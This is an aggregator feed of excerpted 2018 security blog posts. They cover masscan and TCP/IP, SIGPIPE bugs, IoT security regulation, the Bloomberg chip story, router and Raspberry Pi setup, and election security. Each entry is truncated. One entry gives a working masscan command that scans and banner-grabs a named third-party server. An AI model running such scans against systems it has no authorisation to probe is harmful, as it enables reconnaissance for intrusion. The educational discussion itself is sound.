ErrataRob.webp 2018-10-23 20:03:42 Masscan as a lesson in TCP/IP (lien direct) When learning TCP/IP it may be helpful to look at the masscan port scanning program, because it contains its own network stack. This concept, "contains its own network stack", is so unusual that it'll help resolve some confusion you might have about networking. It'll help challenge some (incorrect) assumptions you may have developed about how networks work. For example, here is a screenshot of running masscan to scan a single target from my laptop computer. My machine has an IP address of 10.255.28.209, but masscan runs with an address of 10.255.28.250. This works fine, with the program contacting the target computer and downloading information -- even though it has the 'wrong' IP address. That's because it isn't using the network stack of the notebook computer, and hence, not using the notebook's IP address. Instead, it has its own network stack and its own IP address. At this point, it might be useful to describe what masscan is doing here. It's a "port scanner", a tool that connects to many computers and many ports to figure out which ones are open. In some cases, it can probe further: once it connects to a port, it can grab banners and version information. In the above example, the parameters to masscan used here are:
-p80 : probe for port "80", which is the well-known port assigned for web-services using the HTTP protocol
--banners : do a "banner check", grabbing simple information from the target depending on the protocol. In this case, it grabs the "title" field from the HTML from the server, and also grabs the HTTP headers. It does different banners for other protocols.
--source-ip 10.255.28.250 : this configures the IP address that masscan will use
172.217.197.113 : the target to be scanned. This happens to be a Google server, by the way, though that's not really important.
Now let's change the IP address that masscan is using to something completely different, like 1.2.3.4. The difference from the above screenshot is that we no longer get any data in response. Why is that? Guideline
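Putting those parameters together, the full invocation described above would look like this (run as root; depending on the setup, masscan may also need to be told which network adapter to use):

# masscan -p80 --banners --source-ip 10.255.28.250 172.217.197.113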
ErrataRob.webp 2018-10-22 16:33:56 Some notes for journalists about cybersecurity (lien direct) The recent Bloomberg article about Chinese hacking motherboards is a great opportunity to talk about problems with journalism. Journalism is about telling the truth, not a close approximation of the truth, but the true truth. They don't do a good job at this in cybersecurity. Take, for example, a recent incident where the Associated Press fired a reporter for photoshopping his shadow out of a photo. The AP took a scorched-earth approach, not simply firing the photographer, but removing all his photographs from their library. That's because there is a difference between truth and near truth. Now consider Bloomberg's story, such as a photograph of a tiny chip. Is that a photograph of the actual chip the Chinese inserted into the motherboard? Or is it another chip, representing the size of the real chip? Is it truth or near truth? Or consider the technical details in Bloomberg's story. They are garbled, as this discussion shows. Something like what Bloomberg describes is certainly plausible; something exactly like what Bloomberg describes is impossible. Again there is the question of truth vs. near truth. There are other near truths involved. For example, we know that supply chains often replace high-quality expensive components with cheaper, lower-quality knockoffs. It's perfectly plausible that some of the incidents Bloomberg describes are that known issue, which they are then hyping as being hacker chips. This demonstrates how truth and near truth can be quite far apart, telling very different stories. Another example is a NYTimes story about a terrorist's use of encryption. As I've discussed before, the story has numerous "near truth" errors. The NYTimes story is based upon a transcript of an interrogation of the hacker. The French newspaper Le Monde published excerpts from that interrogation, with details that differ slightly from the NYTimes article. One of the justifications journalists use is that near truth is easier for their readers to understand. First of all, that's no justification for falsehoods. If the words mean something else, then it's false. It doesn't matter if it's simpler. Secondly, I'm not sure they actually are easier to understand. It's still techy gobbledygook. In the Bloomberg article, if I as an expert can't figure out what actually happened, then I know that the average reader can't, either, no matter how much you've "simplified" the language. Stories can solve this by both giving the actual technical terms that experts can understand, then explaining them. Yes, it eats up space, but if you care about the truth, it's necessary. In groundbreaking stories like Bloomberg's, the length is already enough that the average reader won't slog through it. Instead, it becomes a seed for lots of other coverage that explains the story. In such cases, you want to get the techy details, the actual truth, correct, so that we experts can stand behind the story and explain it. Otherwise, going for the simpler near truth means that all us experts simply question the veracity of the story. The companies mentioned in the Bloomberg story have called it an out Hack
ErrataRob.webp 2018-10-21 18:10:54 TCP/IP, Sockets, and SIGPIPE (lien direct) There is a spectre haunting the Internet -- the spectre of SIGPIPE errors. It's a bug in the original design of Unix networking from 1981 that is perpetuated by college textbooks, which teach students to ignore it. As a consequence, sometimes software unexpectedly crashes. This is particularly acute on industrial and medical networks, where security professionals can't run port/security scans for fear of crashing critical devices. An example of why this bug persists is the well-known college textbook "Unix Network Programming" by Richard Stevens. In section 5.13, he correctly describes the problem. When a process writes to a socket that has received an RST, the SIGPIPE signal is sent to the process. The default action of this signal is to terminate the process, so the process must catch the signal to avoid being involuntarily terminated. This description is accurate. The "Sockets" network API was based on the "pipes" interprocess communication when TCP/IP was first added to the Unix operating system back in 1981. This made it straightforward and comprehensible to the programmers at the time. This SIGPIPE behavior made sense when piping the output of one program to another program on the command-line, as is typical under Unix: if the receiver of the data crashes, then you want the sender of the data to also stop running. But it's not the behavior you want for networking. Server processes need to continue running even if a client crashes. But Stevens's description is insufficient. It portrays this problem as optional, one that only exists if the other side of the connection is misbehaving. He never mentions the problem outside this section, and none of his example code handles the problem. Thus, if you base your code on Stevens's, it'll inherit this problem and sometimes crash. The simplest solution is to configure the program to ignore the signal, such as putting the following line of code in your main() function:
   signal(SIGPIPE, SIG_IGN);
If you search popular projects, you'll find this solution there most of the time, such as in openssl. But there is a problem with this approach, as OpenSSL demonstrates: it's both a command-line program and a library. The command-line program handles this error, but the library doesn't. This means that using the SSL_write() function to send encrypted data may encounter this error. Nowhere in the OpenSSL documentation does it mention that the user of the library needs to handle this. Ideally, library writers would like to deal with the problem internally. There are platform-specific ways to deal with this. On Linux, an additional parameter MSG_NOSIGNAL can be added to the send() function. On BSD (including macOS), setsockopt(SO_NOSIGPIPE) can be configured for the socket when it's created (after socket() or after accept()). On Windows and some other operating systems, the SIGPIPE isn't even generated, so nothing needs to be done for those platforms. But it's difficult. Browsing through cross-platform projects like curl, which tries this library technique, I see the following bit:
#ifdef __SYMBIAN32__
/* This isn't actually supported under Symbian OS */
#undef SO_NOSIGPIPE
Guideline
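Pulling those platform notes together, a library-side workaround might look like this sketch (POSIX sockets assumed; the helper names are illustrative):

#include <sys/types.h>
#include <sys/socket.h>

/* BSD/macOS: ask the kernel never to raise SIGPIPE on this socket.
 * Compiles to a no-op on platforms without SO_NOSIGPIPE. */
static void socket_no_sigpipe(int fd)
{
#ifdef SO_NOSIGPIPE
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_NOSIGPIPE, &one, sizeof(one));
#else
    (void)fd;
#endif
}

/* Linux: suppress SIGPIPE for this send() only, getting EPIPE back
 * instead of a signal. Falls back to a plain send() elsewhere. */
static ssize_t send_no_sigpipe(int fd, const void *buf, size_t len)
{
#ifdef MSG_NOSIGNAL
    return send(fd, buf, len, MSG_NOSIGNAL);
#else
    return send(fd, buf, len, 0);
#endif
}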
ErrataRob.webp 2018-10-19 19:24:46 Election interference from Uber and Lyft (lien direct) Almost nothing can escape the taint of election interference. A good example is the announcements by Uber and Lyft that they'll provide free rides to the polls on election day. This well-meaning gesture nonetheless calls into question how this might influence the election. "Free rides" to the polls is a common thing. Taxi companies have long offered such services for people in general. Political groups have long offered such services for their constituencies in particular. Political groups target retirement communities to get them to the polls; black churches have long had their "Souls to the Polls" program across the 37 states that allow early voting on Sundays. But with Uber and Lyft getting into this we now have concerns about "big data", "algorithms", and "hacking". As the various Facebook controversies have taught us, these companies have a lot of data on us that can reliably predict how we are going to vote. If their leaders wanted to, these companies could use this information in order to get those on one side of an issue to the polls. In hotly contested elections, it wouldn't take much to swing the result to one side. Even if they don't do this consciously, their various algorithms (often based on machine learning and AI) may do so accidentally. As is frequently demonstrated, unconscious biases can lead to real world consequences, like facial recognition systems being unable to read Asian faces. Lastly, it makes these companies prime targets for Russian hackers, who may take all of this into account when trying to muck with elections. Or indeed, to simply claim that they did in order to call the results into question. Though to be fair, Russian hackers have so many other targets of opportunity. Messing with the traffic lights of a few cities would be enough to swing a presidential election, specifically targeting areas with certain voters, creating traffic jams that make it difficult for them to get to the polls. Even if it's not "hackers" as such, many will want to game the system. For example, politically motivated drivers may choose to loiter in neighborhoods strongly on one side or the other, helping the right sorts of people vote at the expense of not helping the wrong people. Likewise, drivers might skew the numbers by deliberately hailing rides out of opposing neighborhoods and taking them out of town, or to the right sorts of neighborhoods. I'm trying to figure out which Party this benefits the most. Let's take a look at rider demographics to start with, such as this post. It appears that income levels and gender are roughly evenly distributed. Ridership is skewed urban, with riders being 46% urban, 48% suburban, and 6% rural. In contrast, US population is 31% urban, 55% suburban, and 15% rural. Given the increasing polarization among rural and urban voters, this strongly skews results in favor of Democrats. Likewise, the above numbers show that Uber ridership is strongly skewed to the younger generation, with 55% of the riders 34 and younger. This again strongly skews "free rides" by Uber and Lyft toward the Democrats. Though to be fair, the "over 65" crowd has long had an advantage as the parties have fallen over themselves to bus people from retirement communities to the polls (and older people can get free time on weekdays to vote). Even if you are on the side that appears to benefit, this should still concern you. Our allegiance should first be to a robust and fa Guideline Uber
ErrataRob.webp 2018-10-16 17:06:57 Notes on the UK IoT cybersec "Code of Practice" (lien direct) The British government has released a voluntary "Code of Practice" for securing IoT devices. I thought I'd write some notes on it.
First, the good parts
Before I criticize the individual points, I want to praise it for having a clue. So many of these sorts of things are written by the clueless, those who want to be involved in telling people what to do, but who don't really understand the problem. The first part of the clue is restricting the scope. Consumer IoT is so vastly different from things like cars, medical devices, industrial control systems, or mobile phones that they should never really be talked about in the same guide. The next part of the clue is understanding the players. It's not just the device that's a problem, but also the cloud and mobile app part that relates to the device. Though they do go too far and include the "retailer", which is a bit nonsensical. Lastly, while I'm critical of most all the points on the list and how they are described, it's probably a complete list. There's not much missing, and at the same time, it includes little that isn't necessary. In contrast, a lot of other IoT security guides lack important things, or take the "kitchen sink" approach and try to include everything conceivable.
1) No default passwords
Since the Mirai botnet of 2016 famously exploited default passwords, this has been at the top of everyone's list. It's the most prominent feature of the recent California IoT law. It's the major feature of federal proposals. But this is only a superficial understanding of what really happened. The issue wasn't default passwords so much as Internet-exposed Telnet. IoT devices are generally based on Linux, which maintains operating-system passwords in the /etc/passwd file. However, devices almost never use that. Instead, the web-based management interface maintains its own password database. The underlying Linux system is vestigial like an appendix and not really used. But these devices exposed Telnet, providing a path to this otherwise unused functionality. I bought several of the Mirai-vulnerable devices, and none of them used /etc/passwd for anything other than Telnet. Another way default passwords get exposed in IoT devices is through debugging interfaces. Manufacturers configure the system one way for easy development, and then ship a separate "release" version. Sometimes they make a mistake and ship the development backdoors as well. Programmers often insert secret backdoor accounts into products for development purposes without realizing how easy it is for hackers to discover those passwords. The point is that this focus on backdoor passwords is misunderstanding the problem. Device makers can easily believe they are compliant with this directive while still having backdoor passwords. As for the web management interface, saying "no default passwords" is useless. Users have to be able to set up the device the first time, so there has to be some means to connect to the device without passwords initially. Device makers don't know how to do this without default passwords. Instead of mindless guidance of what not to do, a document needs to be written that explains how devices can do this both securely and in a way easy enough for users to actually use. Humorously, the footnotes in this section do reference external documents that might explain this, but they are the wrong documents, appropriate for things like website password policies, but inappropriate for IoT web interfaces. 
This again demonstrates how they have only a superficial understanding of the problem.
2) Implement a vulnerability disclosure policy
This is a clueful item, and it should be the #1 item on every list. Hack
ErrataRob.webp 2018-10-14 04:57:46 How to irregular cyber warfare (lien direct) Somebody (@thegrugq) pointed me to this article on "Lessons on Irregular Cyber Warfare", citing the masters like Sun Tzu, von Clausewitz, Mao, Che, and the usual characters. It tries to answer:
...as an insurgent, which is in a weaker power position vis-a-vis a stronger nation state; how does cyber warfare plays an integral part in the irregular cyber conflicts in the twenty-first century between nation-states and violent non-state actors or insurgencies
I thought I'd write a rebuttal. None of these people provide any value. If you want to figure out cyber insurgency, then you want to focus on the technical "cyber" aspects, not "insurgency". I regularly read military articles about cyber written by people who, as in the above article, demonstrate little experience in cyber. The chief technical lesson for the cyber insurgent is the Birthday Paradox. Let's say, hypothetically, you go to a party with 23 people total. What's the chance that any two people at the party have the same birthday? The answer is 50.7%. With a party of 75 people, the chance rises to 99.9% that two will have the same birthday. The paradox is that your intuitive way of calculating the odds is wrong. You are thinking the odds are like those of somebody having the same birthday as yourself, which is indeed roughly 23 out of 365. But we aren't talking about you vs. the remainder of the party, we are talking about any possible combination of two people. This dramatically changes how we do the math. In cryptography, this is known as the "Birthday Attack". One crypto task is to uniquely fingerprint documents. Historically, the most popular way of doing this was with an algorithm known as "MD5" which produces 128-bit fingerprints. Given a document with an MD5 fingerprint, it's impossible to create a second document with the same fingerprint. However, with MD5, it's possible to create two documents with the same fingerprint. In other words, we can't modify only one document to get a match, but we can keep modifying two documents until their fingerprints match. As with the party: finding somebody with your birthday is hard, finding any two people with the same birthday is easier. The same principle works with insurgencies. Accomplishing one specific goal is hard, but accomplishing any goal is easy. Trying to do a narrowly defined task to disrupt the enemy is hard, but it's easy to support a group of motivated hackers and let them do any sort of disruption they can come up with. The above article suggests a means of using cyber to disrupt a carrier attack group. This is an example of something hard, a narrowly defined attack that is unlikely to actually work in the real world. Conversely, consider the attacks attributed to North Korea, like those against Sony or the Wannacry virus. These aren't the careful planning of a small state actor trying to accomplish specific goals. These are the actions of an actor that supports hacker groups, and lets them loose without a lot of oversight and direction. Wannacry in particular is an example of an undirected cyber attack. We know from our experience with network worms that its effects were impossible to predict. Somebody just stuck the newly discovered NSA EternalBlue payload into an existing virus framework and let it run to see what happens. As we worm experts know, nobody could have predicted the results of doing so, not even its creators. Another example is the DNC election hacks. 
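To make that arithmetic concrete, here's a minimal sketch that computes those probabilities by multiplying out the chance that everyone's birthday is distinct:

#include <stdio.h>

int main(void)
{
    double all_distinct = 1.0;   /* P(no shared birthday so far) */
    for (int n = 2; n <= 75; n++) {
        /* the n-th person must avoid the n-1 birthdays already taken */
        all_distinct *= (365.0 - (n - 1)) / 365.0;
        if (n == 23 || n == 75)
            printf("n=%2d: P(shared birthday) = %.2f%%\n",
                   n, 100.0 * (1.0 - all_distinct));
    }
    return 0;
}
/* Prints about 50.73% for n=23 and 99.97% for n=75. */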
The reason we can attribute them to Russia is that it wasn't their narrow goal. Instead, by looking at things like their URL shortener, we can see that they flailed around broadly all over cyberspace. The DNC was just one of thei Hack Guideline Wannacry
ErrataRob.webp 2018-10-04 16:36:51 Notes on the Bloomberg Supermicro supply chain hack story (lien direct) Bloomberg has a story about how Chinese intelligence inserted secret chips into servers bound for America. There are a couple issues with the story I wanted to address. The story is based on anonymous sources, and not even good anonymous sources. An example is this attribution:
a person briefed on evidence gathered during the probe says
That means somebody not even involved, but somebody who heard a rumor. It also doesn't mean the person even had sufficient expertise to understand what they were being briefed about. The technical detail that's missing from the story is that the supply chain is already messed up with fake chips rather than malicious chips. Reputable vendors spend a lot of time ensuring quality, reliability, tolerances, ability to withstand harsh environments, and so on. Even the simplest of chips can command a price premium when they are well made. What happens is that other companies make clones that are cheaper and lower quality. They are just good enough to pass testing, but fail in the real world. They may not even be completely fake chips. They may be bad chips the original manufacturer discarded, or chips the night shift at the factory secretly ran through on the equipment -- but with less quality control. The supply chain description in the Bloomberg story is accurate, except that it fails to discuss how these cheap, bad chips frequently replace the more expensive chips, with contract manufacturers or managers skimming off the profits. Replacement chips are real, but whether they are for malicious hacking or just theft is the sticking point. For example, consider this listing for a USB-to-serial converter using the well-known FTDI chip. The word "genuine" is in the title, because fake FTDI chips are common within the supply chain. As you can see from the $11 price, the amount of money you can make with fake chips is low -- these contract manufacturers hope to make it up in volume. The story implies that Apple is lying in its denials of malicious hacking, and deliberately avoids this other supply chain issue. It's perfectly reasonable for Apple to have rejected Supermicro servers because of bad chips that have nothing to do with hacking. If there's hacking going on, it may not even be Chinese intelligence -- the manufacturing process is so lax that any intelligence agency could be responsible. Just because most manufacturing of server motherboards happens in China doesn't point the finger to Chinese intelligence as being the ones responsible. Finally, I want to point out the sensationalism of the story. It spends much effort focusing on the invisible nature of small chips, as evidence that somebody is trying to hide something. That the chips are so small means nothing: except for the major chips, all the chips on a motherboard are small. It's hard to have large chips, except for the big things like the CPU and DRAM. Serial ROMs containing firmware are never going to be big, because they just don't hold that much information. A fake serial ROM is the focus here not so much because that's the chip they found by accident, but because that's the chip they'd look for. The chips contain the firmware for other hardware devices on the motherboard. Thus, instead of designing complex hardware to do malicious things, a hacker simply has to make simple changes t Hack
ErrataRob.webp 2018-09-28 18:52:32 Mini pwning with GL-iNet AR150 (lien direct) Seven years ago, before the $35 Raspberry Pi, hackers used commercial WiFi routers for their projects. They'd replace the stock firmware with Linux. The $22 TP-Link WR703N was extremely popular for these projects, being half the price and half the size of the Raspberry Pi. Unfortunately, these devices had extraordinarily limited memory (16-megabytes) and even more limited storage (4-megabyte). That's megabytes -- the typical size of an SD card in an RPi is a thousand times larger. I'm interested in that device for the simple reason that it has a big-endian CPU. All these IoT-style devices these days run ARM and MIPS processors, with a smattering of others like x86, PowerPC, ARC, and AVR32. ARM and MIPS CPUs can run in either mode, big-endian or little-endian. Linux can be compiled for either mode. Little-endian is by far the most popular mode, because of Intel's popularity. Code developed on little-endian computers sometimes has subtle bugs when recompiled for big-endian, so it's best just to maintain the same byte-order as Intel. On the other hand, popular file-formats and crypto-algorithms use big-endian, so there's some efficiency to be gained by going with that choice. I'd like to have a big-endian computer around to test my code with. In theory, it should all work fine, but as I said, subtle bugs sometimes appear. The problem is that the base Linux kernel has slowly grown so big I can no longer get things to fit on the WR703N, not even to the point where I can add extra storage via the USB drive. I've tried to hack a firmware but succeeded only in bricking the device. An alternative is the GL-AR150. This is a company that sells commercial WiFi products like the other vendors, but caters to hackers and hobbyists. Recognizing the popularity of that TP-LINK device, they essentially made a clone with more stuff, with 16-megabytes of storage and 64-megabytes of RAM. They intend for people to rip off the case and access the circuit board directly: they've included the pins for a console serial port to be directly connected, connectors for additional WiFi antennas, and pads for soldering wires to GPIO pins for hardware projects. It's a thing of beauty. So this post is about the steps I took to get things working for myself. The first step is to connect to the device. One way to do this is to connect the notebook computer to their WiFi, then access their web-based console. Another way is to connect to their "LAN" port via Ethernet. I chose the Ethernet route. The problem with their Ethernet port is that you have to manually set your IP address. Their address is 192.168.8.1. I handled this by going into the Linux virtual-machine on my computer, putting the virtual network adapter into "bridge" mode (as I always do anyway), and setting an alternate IP address:
# ifconfig eth:1 192.168.8.2 255.255.255.0
The firmware I want to install is from the OpenWRT project, which maintains Linux firmware replacements for over a hundred different devices. The device actually already uses their own variation of OpenWRT, but still, rather than futz with theirs I want to go with a vanilla installation.
https://wiki.openwrt.org/toh/gl-inet/gl-ar150
I download this using the browser in my Linux VM, then browse to 19
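On Linux systems where the old ifconfig alias syntax isn't available, the same temporary address can be added with iproute2 (a sketch; adjust the interface name to match your VM):

# ip addr add 192.168.8.2/24 dev eth0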
ErrataRob.webp 2018-09-10 17:33:17 California\'s bad IoT law (lien direct) California has passed an IoT security bill, awaiting the governor's signature/veto. It's a typically bad bill based on a superficial understanding of cybersecurity/hacking that will do little to improve security, while doing a lot to impose costs and harm innovation. It's based on the misconception of adding security features. It's like dieting, where people insist you should eat more kale, which does little to address the problem that you are pigging out on potato chips. The key to dieting is not eating more but eating less. The same is true of cybersecurity, where the point is not to add “security features” but to remove “insecure features”. For IoT devices, that means removing listening ports and cross-site/injection issues in web management. Adding features is typical “magic pill” or “silver bullet” thinking that we spend much of our time in infosec fighting against. We don't want arbitrary features like firewall and anti-virus added to these products. It'll just increase the attack surface, making things worse. The one possible exception to this is “patchability”: some IoT devices can't be patched, and that is a problem. But even here, it's complicated. Even if IoT devices are patchable in theory, there is no guarantee vendors will supply such patches, or worse, that users will apply them. Users overwhelmingly forget about devices once they are installed. These devices aren't like phones/laptops which notify users about patching. You might think a good solution to this is automated patching, but only if you ignore history. Many rate “NotPetya” as the worst, most costly, cyberattack ever. That was launched by subverting an automated patch. Most IoT devices exist behind firewalls, and are thus very difficult to hack. Automated patching gets beyond firewalls; it makes it much more likely mass infections will result from hackers targeting the vendor. The Mirai worm infected fewer than 200,000 devices. A hack of a tiny IoT vendor can gain control of more devices than that in one fell swoop. The bill does target one insecure feature that should be removed: hardcoded passwords. But they get the language wrong. A device doesn't have a single password, but many things that may or may not be called passwords. A typical IoT device has one system for creating accounts on the web management interface, a wholly separate authentication system for services like Telnet (based on /etc/passwd), and yet a wholly separate system for things like debugging interfaces. Just because a device does the prescribed thing of using a unique or user-generated password in the user interface doesn't mean it doesn't also have a bug in Telnet. That was the problem with devices infected by Mirai. The description that these were hardcoded passwords is only a superficial understanding of the problem. The real problem was that there were different authentication systems in the web interface and in other services like Telnet. Most of the devices vulnerable to Mirai did the right thing on the web interfaces (meeting the language of this law), requiring the user to create new passwords before operating. They just did the wrong thing elsewhere. People aren't really paying attention to what happened with Mirai. They look at the 20 billion new IoT devices that are going to be connected to the Internet by 2020 and believe Mirai is just the tip of the iceberg. But it isn't. The IPv4 Internet has only 4 billion addresses, which are pretty much already used up. 
This means those 20 billion won't be exposed to the public Internet like Mirai devices, but hidden behind firewalls that translate addresses. Thus, rather than Mirai presaging the future, it represents the last gasp of the past that is unlikely to come again. This law is backwards looking rather than forward looking. Forward looking, by far the most important t Hack Threat Patching Guideline NotPetya Tesla
ErrataRob.webp 2018-08-29 22:22:49 Debunking Trump\'s claim of Google\'s SOTU bias (lien direct) Today, Trump posted this video proving Google promoted all of Obama's "State of the Union" (SotU) speeches but none of his own. In this post, I debunk this claim. The short answer is this: it's not Google's fault but Trump's for not having a sophisticated social media team.
#StopTheBias pic.twitter.com/xqz599iQZw - Donald J. Trump (@realDonaldTrump) August 29, 2018
The evidence still exists at the Internet Archive (aka. "Wayback Machine") that archives copies of websites. That was probably how that Trump video was created, by using that website. We can indeed see that for Obama's SotU speeches, Google promoted them, such as this example of his January 12, 2016 speech: And indeed, if we check for Trump's January 30, 2018 speech, there's no such promotion on Google's homepage: But wait a minute, Google claims they did promote it, and there's even a screenshot on Reddit proving Google is telling the truth. Doesn't this disprove Trump? No, it actually doesn't, at least not yet. It's comparing two different things. In the Obama example, Google promoted hours ahead of time that there was an upcoming event. In the Trump example, they didn't do that. Only once the event went live did they mention it. I failed to notice this in my examples above because the Wayback Machine uses GMT timestamps. At 9pm EST when Trump gave his speech, it was 2am the next day in GMT. So picking the Wayback page from January 31st we do indeed see the promotion of the live event. But ho
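For reference, Wayback Machine snapshot URLs encode that GMT timestamp (YYYYMMDDhhmmss) directly in the path, which is how captures can be lined up against a 9pm EST event; the timestamp below is a hypothetical example:

https://web.archive.org/web/20180131020000/https://www.google.com/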
ErrataRob.webp 2018-08-27 01:56:09 Provisioning a headless Raspberry Pi (lien direct) The typical way of installing a fresh Raspberry Pi is to attach power, keyboard, mouse, and an HDMI monitor. This is a pain, especially for the diminutive RPi Zero. This blogpost describes a number of options for doing headless setup. There are several options for this, including Ethernet, Ethernet gadget, WiFi, and serial connection. These examples use a MacBook; maybe I'll get around to a blogpost describing this from Windows.
Burning micro SD card
We are going to edit the SD card before booting, so for completeness, I thought I'd describe the process of burning an SD card. We are going to download the latest "raspbian" operating system. I download the "lite" version because I'm not using the desktop features. It comes as a compressed .zip file which we need to extract into an .img file. Just double-click on the .zip on Windows or Mac. The next step is to burn the image to an SD card. On Windows I use Win32DiskImager. On Mac I use the following command-line steps:
$ sudo -s
# mount
# diskutil unmount /dev/disk2s1
# dd bs=1m if=~/Downloads/2018-06-27-raspbian-stretch-lite.img of=/dev/disk2 conv=sync
First, I need a root prompt. I then use the mount command to find out where the micro SD card is mounted in the file system. It's usually /dev/disk2s1, but could be disk3 or disk4 depending upon other things that may already be mounted on my Mac, such as USB drives or dmg files. It's important to know the correct drive because the dd utility is unforgiving of mistakes and can wipe out your entire drive. For gosh's sake, don't use disk1!!!! Remember dd stands for danger-danger (well, many claim it stands for disk-dump, but seriously, it's dangerous). The next step is to unmount the drive. Instead of the Unix umount utility, use the diskutil unmount macOS tool. Now we use good ol' dd to copy the image over. The above example is my recently downloaded raspbian image that's two months old. When you do this, it'll be a newer version with a different file name, so look in your ~/Downloads folder for the correct name. This takes a while to write to the SD card. You can type [ctrl-T] to see progress if you want. When we are done writing, don't eject the card. We are going to edit the contents as described below before we stick it into our Raspberry Pi. After running dd, it's going to become automatically mounted on your Mac; on mine it comes up as /Volumes/boot. When I say "root directory of the SD card" in the instructions below, I mean that directory. Troubleshooting: If you get the "Resource busy" error when running dd, it means you didn't unmount the drive. Go back and run diskutil unmount /dev/disk2s1 (or equivalent for whatever mount tells you which drive the SD card is using). You can use the "raw" disk instead of the normal disk, such as /dev/rdisk2. I don't know what the tradeoffs are.
Ethernet
The RPi B comes with Ethernet built-in Guideline
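The post goes on to cover those options; as a sketch of the standard Raspbian headless mechanisms (shown with the macOS mount point from above): an empty file named ssh in the boot partition enables the SSH server on first boot, and a wpa_supplicant.conf placed there configures WiFi.

$ touch /Volumes/boot/ssh
$ cat > /Volumes/boot/wpa_supplicant.conf <<'EOF'
country=US
ctrl_interface=DIR=/var/run/wpa_supplicant GROUP=netdev
update_config=1
# placeholder credentials -- substitute your own
network={
    ssid="example-network"
    psk="example-password"
}
EOF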
ErrataRob.webp 2018-08-20 16:06:46 DeGrasse Tyson: Make Truth Great Again (lien direct) Neil deGrasse Tyson tweets the following:
I'm okay with a US Space Force. But what we need most is a Truth Force - one that defends against all enemies of accurate information, both foreign & domestic. - Neil deGrasse Tyson (@neiltyson) August 20, 2018
When people make comparisons with Orwell's "Ministry of Truth", he obtusely persists:
A good start: The National Academy of Sciences, which “…provides objective, science-based advice on critical issues affecting the nation." - Neil deGrasse Tyson (@neiltyson) August 20, 2018
Given that Orwellian dystopias were the theme of this summer's DEF CON hacker conference, let's explore what's wrong with this idea.
Truth vs. "Truth"
I work in a corrupted industry, variously known as the "infosec" community or "cybersecurity" industry. It's a great example of how truth is corrupted into "Truth". At a recent government policy meeting, I pointed out how vendors often downplay the risk of bugs (vulnerabilities that can be exploited by hackers). When vendors are notified of these bugs and release a patch to fix them, they often give a risk rating. These ratings are often too low, in order to protect the corporate reputation. The representative from Oracle claimed that they didn't do that, and that indeed, they'll often overestimate the risk. Other vendors chimed in, also claiming they rated the risk higher than it really was. In a neutral world, deliberately overestimating the risk would be the same falsehood as deliberately underestimating it. But we live in a non-neutral world, where only one side is a lie, the middle is truth, and the other side is "Truth". Lying in the name of the "Truth" is somehow acceptable. Moreover, Oracle is famous for having downplayed the risk of significant bugs in the past, and is well-known in the industry as being the least trustworthy vendor as far as security of their products is concerned. Much of their policy effort in Washington D.C. is focused on preventing their dirty laundry from being exposed. They aren't simply another vendor promoting "Truth", but one deliberately exploiting "Truth" to corrupt ends. That we should exaggerate the risks of cybersecurity, deliberately lie to people for their own good, is the uncontroversial consensus of our infosec/cybersec community. Most do it, few think this is wrong. Security is a moral imperative that justifies "Truth".
The National Academy of Scientists
So are we getting the truth or "Truth" from organizations like the National Academy of Scientists? The question here isn't global warming. That mankind's carbon emissions warm the climate is truth. We have a good understanding of how greenhouse gases work, as well as many measures of the climate showing that warming is occurring. The Arctic is steadily losing ice each summer. Instead, the question is "Global Warming", the claims made by politicians on the subject. Do politicians on the left fairly represent the truth, or are they the "Truth"? Which side is the National Academy of Sciences on? Are they committed to the truth, or (like the infosec/cybersec community) are they pursuing "Truth"? Is global warming a moral imperative that justifies playing loose with the facts? Googling "national academy of sciences climate chang Guideline APT 32
ErrataRob.webp 2018-08-08 20:09:17 That XKCD on voting machine software is wrong (lien direct) The latest XKCD comic on voting machine software is wrong, profoundly so. It's the sort of thing that appeals to our prejudices, but mistakes the details.
Accidents vs. attack
The biggest flaw is that the comic confuses accidents vs. intentional attack. Airplanes and elevators are designed to avoid accidental failures. If that's the measure, then voting machine software is fine and perfectly trustworthy. Such machines are no more likely to accidentally record a wrong vote than the paper voting systems they replaced -- indeed less likely. The reason we have electronic voting machines in the first place was due to the "hanging chad" problem in the Bush v. Gore election of the year 2000. After that election, a wave of new, software-based voting machines replaced the older inaccurate paper machines. The question is whether software voting machines can be attacked. Well, if that's the measure, then airplanes aren't safe at all. Security against human attack consists of the entire infrastructure outside the plane, from the TSA forcing us to take off our shoes to trade restrictions preventing the proliferation of Stinger missiles. Confusing the two, accidents vs. attack, is used here because it makes the reader feel superior. We get to mock and feel superior to those stupid software engineers for not living up to what's essentially a fictional standard of reliability. To repeat: software is better than the mechanical machines they replaced, which is why there are so many software-based machines in the United States. The issue isn't normal accuracy, but their robustness against a different standard, against attack -- a standard which airplanes and elevators suck at.
The problems are as much hardware as software
Last year at the DEF CON hacking conference they had an "Election Hacking Village" where they hacked a number of electronic voting machines. Most of those "hacks" were against the hardware, such as soldering on a JTAG device or accessing USB ports. Other errors have been voting machines being sold on eBay whose data wasn't wiped, allowing voter records to be recovered. What we want to see is hardware designed more like an iPhone, where the FBI can't decrypt a phone even when they really really want to. This requires special chips, such as secure enclaves, signed boot loaders, and so on. Only once we get the hardware right can we complain about the software being deficient. To be fair, software problems were also found at DEF CON, like an exploit over WiFi. Though, for a lot of the problems it's questionable whether the fault lies in the software design or the hardware design; they are fixable in either one. The situation is better described as the entire design being flawed, from the "requirements", to the high-level system "architecture", and lastly to the actual "software" code.
It's lack of accountability/fail-safes
We imagine the threat is that votes can be changed in the voting machine, but it's more profound than that. The problem is that votes can be changed invisibly. The first change experts want to see is adding a paper trail, rather than fixing bugs. Consider "recounts". With many of today's electronic voting machines, this is meaningless, with nothing to recount. The machine produces a number, and we have nothing else to test against whether that number is correct or fa Hack Threat
